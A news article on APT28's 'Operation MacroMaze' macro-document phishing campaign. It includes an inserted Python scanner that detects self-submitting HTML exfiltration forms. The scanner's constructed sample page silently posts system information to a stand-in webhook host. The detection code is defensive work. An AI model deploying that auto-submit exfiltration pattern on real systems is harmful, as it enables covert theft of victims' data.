TechRadar
Sead Fadilpašić

Russian hackers target European firms with new spear-phishing cyberattacks

  • APT28 (Fancy Bear) reportedly running “Operation MacroMaze” since Sept 2025
  • Spear-phishing emails with macro-laden Word docs used to drop infostealers
  • Attack chain relies on simple scripts and HTML, maximizing stealth and persistence

APT28, the infamous Russian state-sponsored hacking group also known as Fancy Bear or Sofacy, has been observed targeting “specific entities” in Western and Central Europe with infostealers.

In a newly released report, security researchers at Lab52, the threat intelligence team of S2 Grupo, detailed “Operation MacroMaze”, which has been ongoing since at least late September 2025 and was still active in January 2026.

The campaign starts with a highly personalized spear-phishing email. The topics and contents vary, but they’re mostly related to diplomatic themes. In one instance, the researchers said they saw a slightly altered copy of official diplomatic agendas being distributed.

Word documents and macros

The emails come with a macro-laden Microsoft Word document. Macros are small programs or scripts that can be created inside Microsoft Word to automate repetitive tasks. However, they were so heavily abused over the years that Microsoft disabled them by default, especially for files downloaded from the internet.

However, the attackers carefully designed the Word files around that fact, tricking victims into enabling macros and running the malicious code. Lab52 also said that the malware was designed to notify the attackers when the victim actually executes the file.

When a victim enables macros, the document triggers a chain reaction that, instead of dropping a single infostealer malware variant, drops multiple small scripts and HTML templates.

These established persistence, reconstructed a command payload from downloaded fragments, collected basic system information, and exfiltrated the results via an auto-submitting HTML form.

“This campaign proves that simplicity can be powerful,” the researchers explained. “The attacker uses very basic tools (batch files, tiny VBS launchers and simple HTML) but arranges them with care to maximise stealth: Moving operations into hidden or off-screen browser sessions, cleaning up artifacts, and outsourcing both payload delivery and data exfiltration to widely used webhook services.”
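The exfiltration step described above (an HTML page whose form posts collected system information to a webhook host without any user action) leaves a recognisable pattern in the HTML itself. The following is an added detection example, not code from Lab52 or TechRadar: it scans an HTML file for forms that the page submits on its own and reports their external POST targets. The trusted-host list, the `webhook.invalid` host and the sample HTML are all constructed for this illustration.

```python
"""Added example: flag HTML files containing a self-submitting form that POSTs
to an external host, the exfiltration pattern described in the article.
TRUSTED_HOSTS and the SAMPLE page below are constructed, not from the report."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical list of hosts the organisation owns; anything else counts as external.
TRUSTED_HOSTS = {"intranet.example.org"}


class _FormScanner(HTMLParser):
    """Collect every <form> and note whether the page triggers submit() itself."""

    def __init__(self):
        super().__init__()
        self.forms = []            # (action, method) for each <form>
        self.auto_submit = False   # set when onload= or <script> calls submit()
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append((a.get("action") or "", (a.get("method") or "get").lower()))
        elif tag == "body" and "submit(" in (a.get("onload") or ""):
            self.auto_submit = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands script bodies to handle_data as raw text
        if self._in_script and re.search(r"\.submit\s*\(", data):
            self.auto_submit = True


def find_auto_submit_exfil(html: str) -> list:
    """Return external hosts that a self-submitting POST form would send data to."""
    scanner = _FormScanner()
    scanner.feed(html)
    if not scanner.auto_submit:
        return []
    hits = []
    for action, method in scanner.forms:
        host = urlparse(action).hostname
        if method == "post" and host and host not in TRUSTED_HOSTS:
            hits.append(host)
    return hits


# Constructed sample resembling the described exfil page; hidden field is made-up data.
SAMPLE = """<html><body onload="document.forms[0].submit()">
<form method="post" action="https://webhook.invalid/collect">
<input type="hidden" name="sysinfo" value="host=WS01;user=jdoe"></form></body></html>"""
```

A hit from this scanner on a file dropped by an Office macro is worth an alert; a form that only submits on user interaction, or one posting to a trusted host, is ignored.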

The group behind Operation MacroMaze, APT28, has been actively involved in Russia’s “Special Military Operation”, attacking the infrastructure of Ukraine and its allies as it takes the war against Ukraine into cyberspace.

Via The Hacker News
